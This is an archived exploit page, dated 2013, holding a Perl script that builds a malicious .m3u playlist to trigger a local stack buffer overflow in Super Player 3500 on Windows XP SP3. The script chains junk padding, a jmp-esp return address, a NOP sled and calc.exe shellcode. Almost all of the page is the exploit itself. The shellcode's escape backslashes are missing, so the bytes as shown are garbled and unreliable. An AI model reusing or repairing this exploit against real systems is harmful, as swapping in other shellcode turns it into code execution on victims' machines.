Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow
# Published : 2013-07-23
# Author :
# Previous Title : Novell Client 2 SP3 Privilege Escalation Exploit
# Next Title : 返回列表

#!/usr/bin/perl

#SuperPlayer3500 Local stack based buffer overflow
#Author:jun
#Email:haojunhou@gmail.com
#Date:Tue Jul 22 2013
#Vendor Link:http://www.haojie.cn
#Software Link:http://www.haojie.cn/download/setup_3500.exe
#App Version:3500
#Tested on:windows xp sp3

$file = "superplay3500exp.M3U";
$junk = "A" x 348;
$eip = pack('V', 0x77d29353); #jmp esp on user32.dll
$nops = "x90" x 20;

#exec calc.exe
$shellcode =
"x33xc9xb8xd1xa3x3dx27xdaxdfxd9x74x24xf4xb1" .
"x32x5ax83xc2x04x31x42x0cx03x93xafxdfxd2xef" .
"x58x96x1dx0fx99xc9x94xeaxa8xdbxc3x7fx98xeb" .
"x80x2dx11x87xc5xc5xa2xe5xc1xeax03x43x34xc5" .
"x94x65xf8x89x57xe7x84xd3x8bxc7xb5x1cxdex06" .
"xf1x40x11x5axaax0fx80x4bxdfx4dx19x6dx0fxda" .
"x21x15x2ax1cxd5xafx35x4cx46xbbx7ex74xecxe3" .
"x5ex85x21xf0xa3xccx4exc3x50xcfx86x1dx98xfe" .
"xe6xf2xa7xcfxeax0bxefxf7x14x7ex1bx04xa8x79" .
"xd8x77x76x0fxfdxdfxfdxb7x25xdexd2x2exadxec" .
"x9fx25xe9xf0x1exe9x81x0cxaax0cx46x85xe8x2a" .
"x42xcexabx53xd3xaax1ax6bx03x12xc2xc9x4fxb0" .
"x17x6bx12xdexe6xf9x28xa7xe9x01x33x87x81x30" .
"xb8x48xd5xccx6bx2dx27x3cxa6xbbxb0xe7x53x86" .
"xdcx17x8exc4xd8x9bx3bxb4x1ex83x49xb1x5bx03" .
"xa1xcbxf4xe6xc5x78xf4x22xa6x1fx66xaex29"."rn";

open(FILE,">$file");
print FILE $junk.$eip.$nops.$shellcode;
close(FILE);